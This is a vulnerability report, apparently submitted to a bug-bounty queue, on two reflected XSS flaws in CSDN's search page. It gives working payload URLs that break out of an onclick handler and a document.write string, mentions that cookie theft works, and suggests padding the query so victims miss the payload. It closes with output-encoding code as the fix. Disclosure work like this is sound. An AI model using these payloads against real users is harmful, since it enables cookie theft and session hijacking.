CSDN has a reflected XSS elsewhere that I have already submitted; this is another case. I have written both up here, though not in detail, so if it already shows up in the admin queue, delete it.
The affected page is CSDN's search at http://so.csdn.net/search, and it has two different XSS vulnerabilities.
The search link is
http://so.csdn.net/search?utf8=%E2%9C%93&t=&q=xxx&commit=%E6%90%9C+%E7%B4%A2&sort=
Here xxx is the user input. View the page source and search for that string; in this case the string is "aaa".
1. First location.
Almost every link on the results page has an onclick handler, and the search keyword appears inside it in each result title. The code:
<a href="http://blog.csdn.net/walterhj/article/details/6070450" onclick="click_log('blog', 'aaa', '123')" target="_blank">Simware combined with the <span class="keyword">AAA</span> experiment of Cisco ACS</a>
So the test is to close the single quote and the parenthesis in
onclick="click_log('blog', 'aaa', '000000')" and then append our own statement, which runs when a user clicks a search result.
Constructed parameter:
aaaa'); alert(/xss/) // which gives the link
http://so.csdn.net/search?utf8=%E2%9C%93&t=&q=aaaaaa')%3balert(%2fxss%2f)//&commit=%E6%90%9C+%E7%B4%A2&sort= . Clicking any search result on that page pops up an alert box.
Popping the cookie also works when tried. After the onclick handler has run, the browser continues to the linked result as normal. The search string can of course be padded so that the special characters are pushed out of view in the search box and users do not notice them.
I did not think about this much; for example:
"To improve the assembly language level, in addition to Wang Shuang, Which books can be read? '); alert (/xss/) //" is a long string plus code, to keep users from noticing. URL-encoding this string and putting it in the q parameter works well.
2. Second location.
When searching for "aaa", I also found this statement at the bottom of the page source:
<script>document.write("
This code writes out an image link. So can we construct input that closes the image tag and adds an onerror handler? The page does not filter backslashes, so the characters can be supplied as JavaScript hexadecimal escapes (\xHH), which the string literal decodes, to bypass the filter.
"onerror="alert(/xss/)"> encoded: \x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x2f\x78\x73\x73\x2f\x29\x22\x3e
The complete link is:
http://so.csdn.net/search?utf8=%E2%9C%93&t=&q=\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x2f\x78\x73\x73\x2f\x29\x22\x3e&commit=%E6%90%9C+%E7%B4%A2&sort= . This can be compared with the one above, though loading was very slow on my machine.
Fix:
Stricter filtering and escaping of the search parameter before it is echoed into the onclick attribute and the document.write string.
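As an added example (not CSDN's code), here is the fix worked through as context-aware output encoding for the two sinks above; it generalises beyond the two payloads shown, since every non-alphanumeric character is escaped. The function names, the `/img/<keyword>.png` shape of the document.write snippet and the `'123'` argument are assumptions.

```javascript
// Added example, not CSDN's code: context-aware output encoding for the two sinks
// in this write-up. The search keyword is assumed to arrive as a plain string.

// HTML text or attribute context: neutralise the five significant characters.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: escape every non-alphanumeric character as \xHH
// or \uHHHH. Quotes, parentheses, slashes and backslashes can then never terminate
// the literal, and a raw "\x22" typed into the search box becomes "\x5cx22".
function jsStringEncode(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// What the JS parser does with the literal at runtime; used to check round trips.
function decodeJsEscapes(s) {
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Sink 1: keyword inside a JS string inside an onclick attribute. The HTML parser
// decodes first and the JS parser second, so apply the JS encoding first (inner
// context) and the HTML encoding last (outer context).
function renderResultLink(href, keyword) {
  const onclick = `click_log('blog', '${jsStringEncode(keyword)}', '123')`;
  return `<a href="${htmlEncode(href)}" onclick="${htmlEncode(onclick)}" target="_blank">` +
    `${htmlEncode(keyword)}</a>`;
}

// Sink 2: keyword inside a JS string that document.write later hands to the HTML
// parser. The JS parser decodes first, so apply the HTML encoding first (inner) and
// the JS encoding last (outer). The output is alphanumerics and escapes only, so
// neither a quote nor "</script>" can reach the written markup.
function encodeForDocumentWrite(keyword) {
  return jsStringEncode(htmlEncode(keyword));
}

// Assumed shape of the original snippet; only the path segment is user-controlled.
function renderImageScript(keyword) {
  return '<script>document.write("<img src=\\"/img/' + encodeForDocumentWrite(keyword) +
    '.png\\">")</script>';
}
```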